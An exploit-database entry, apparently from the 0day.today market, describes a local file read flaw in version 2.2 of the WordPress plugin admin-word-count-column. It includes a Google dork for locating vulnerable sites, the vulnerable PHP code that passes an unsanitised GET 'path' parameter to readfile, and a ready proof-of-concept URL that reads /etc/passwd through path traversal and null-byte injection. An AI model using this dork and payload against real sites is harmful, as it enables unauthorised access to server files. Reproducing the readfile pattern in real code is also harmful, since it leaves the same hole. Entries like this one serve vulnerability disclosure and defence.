[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

WordPress admin-word-count-column 2.2 - Local File Read Vulnerability

Author
Hassan Khan Yusufzai
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-37541
Category
web applications
Date add
29-03-2022
Platform
php
# Exploit Title: WordPress Plugin admin-word-count-column 2.2 - Local
File Download
# Google Dork: inurl:/wp-content/plugins/admin-word-count-column/
# Exploit Author: Hassan Khan Yusufzai - Splint3r7
# Vendor Homepage:
https://wordpress.org/plugins/admin-word-count-column/
<https://wordpress.org/plugins/video-synchro-pdf/>
# Version: 2.2
# Contact me: h [at] spidersilk.com

# PHP version: 5.3.2 or below

# Vulnerable File: plugins/admin-word-count-column/download-csv.php

# Vulnerable Code:

```
<?php
date_default_timezone_set('America/Los_Angeles');
$csvdate = date('Md-H-i-s-T');
$csvname = 'wordcounts-' . $csvdate . '.csv';
header('Content-Type: application/csv');
header('Content-Disposition: attachment; filename=' . $csvname);
header('Pragma: no-cache');
readfile($_GET['path'] . 'cpwc.csv');
?>
```

# Proof of Concept:

localhost/wp-content/plugins/admin-word-count-column/download-csv.php?path=../../../../../../../../../../../../etc/passwd\0

Note: Null byte injection will only working in php 5.3.2 and below 5.3.2.

#  0day.today [2024-12-26]  #